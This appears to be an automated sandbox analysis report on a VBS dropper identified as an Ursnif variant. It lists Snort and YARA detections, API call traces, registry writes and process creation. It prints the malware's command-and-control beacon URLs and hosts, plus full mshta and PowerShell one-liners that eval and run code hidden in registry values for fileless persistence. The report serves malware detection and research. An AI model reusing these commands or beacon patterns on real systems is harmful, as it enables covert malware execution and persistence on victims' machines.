Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp |
Source: | Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80 |
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80 |
Source: global traffic | HTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com |
Source: global traffic | HTTP traffic detected: GET /J7vFZ3DnKfP9_2BLqsOzhE/_2B0sX39iqKXX/xRC3_2Bn/FR7I7tC4Y_2BKbKZhTipXKo/Y68Clp5syo/AKjqJkiRp4I9iXaE1/6hTqbwupKV0Z/G7JGvRt1lPU/_2FoM5FRPpNFQ7/Q0DKQKOrk_2B_2BMtgkLi/AHH7yDMmOl_2BC_2/Bw6mGTTnqH2yR_2/BWwJ_2BspWSt3ypb_2/B3jzGWYjP/wQws_2BBySwRC_2FSzoA/9eCjcMJ9yhEG_2BMBin/PBuDF_2BwHt7nPiirKF3ia/yI6rUSMPL1t1W/Tqi6oYDf/4qfPSjhH9hVkFRq5vohLKMn/uKsZDY_2Bm7_2FTYT00/CD HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at |
Source: global traffic | HTTP traffic detected: POST /0QTFQ19LsLPPw2WV1xJ/YcBhtZLzUs6CSioSs9dLnb/aEb6zuvJhqdcs/1Hb1sg90/RWaFAF1NEpmrckuTWKaPqAA/24G0Hczqd6/RbhQoaSPqBLCdZu1n/MpE8YBnCkgqe/EyYs8PTQfhS/e3P4PnLK5TJvEZ/zj0oBbuVnCwlxQAQ_2FhY/0Zu1rFoV_2B4IBxL/S0k_2BzfYQGXk4l/RlIY9NCU_2Bq2C0qZR/XkIkWaJBq/tdpiFuEgu5qCEOsijppu/WtAIhPYjfYVFXMRTyYR/vZDnI_2BfmuNdCFB6L924B/9580GsWQ3CLj4/gdGO_2FS/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000019.00000003.1134490051.000001B6EB600000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m- |
Source: rundll32.exe, 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, control.exe, 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000019.00000002.1216995781.000001B6D2DE1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000019.00000002.1218191290.000001B6D2FF0000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR |
Source: Yara match | File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2274 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7E30 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC725F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC1754 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E63570 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E490A1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45C88 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4FBA9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E543B9 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E57B5D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5DAED |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB948 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBB230 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA70C8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C990FC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB88B8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91000 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA7820 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA9F8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6944 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE95C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4150 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1164 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5164 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA0124 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C92138 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C99AD8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CABA74 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C9ABDC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4BA0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA3A4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C91348 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA8340 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4354 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C94B60 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB730C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAD328 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA4484 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C974A4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB9408 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB3400 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB4DE0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA1DF4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA559C |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA5DBC |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA9500 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA2EC0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAC6C4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB5ED8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB2EF8 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C976F4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CA6684 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB6EA0 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB06B4 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00C93610 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAA790 |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAF7B4 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1382 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB14FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB1B4A NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_6FBB2495 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC6EB3 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC40DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC7666 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_04BC8055 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E609D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A8F7 NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E58890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5B878 GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E55878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5F7F5 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E437F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E6079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E56657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E555D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E45166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E49D36 NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E60BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E50FBD memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E5FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05E4579C NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CBA8F0 NtSetInformationProcess,CreateRemoteThread, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CB20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CAE860 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF029 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 32_2_00CCF36B NtProtectVirtualMemory, |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs' |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer |
Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' |
